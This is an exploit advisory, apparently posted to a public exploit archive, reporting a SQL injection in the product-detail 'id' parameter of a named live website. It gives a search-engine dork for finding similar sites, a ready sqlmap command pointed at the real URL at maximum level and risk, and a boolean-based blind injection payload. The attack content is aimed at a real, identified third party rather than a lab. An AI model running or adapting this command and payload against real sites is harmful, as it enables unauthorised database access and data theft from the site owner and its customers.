****************************
#Exploit Title: picassoremedies - SQL Injection vulnerability
#Date: 2024-07-05
#Exploit Author: Mahdi Karimi
#Vendor Homepage: https://picassoremedies.in
#Google Dork: "Powered by picassoremedies"
#Tested On: Kali Linux
sqlmap:
python sqlmap.py -u "https://picassoremedies.in/product-detail.php?id=137" --level=5 --risk=3 tamper=space2comment --random-agent
Testing Method;
- boolean-based blind
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=137' AND 1647=1647-- dWxa
**************************************************
#Discovered by: Mahdi Karimi
#Email : mjoker22mjoker22@gmail.com
**************************************************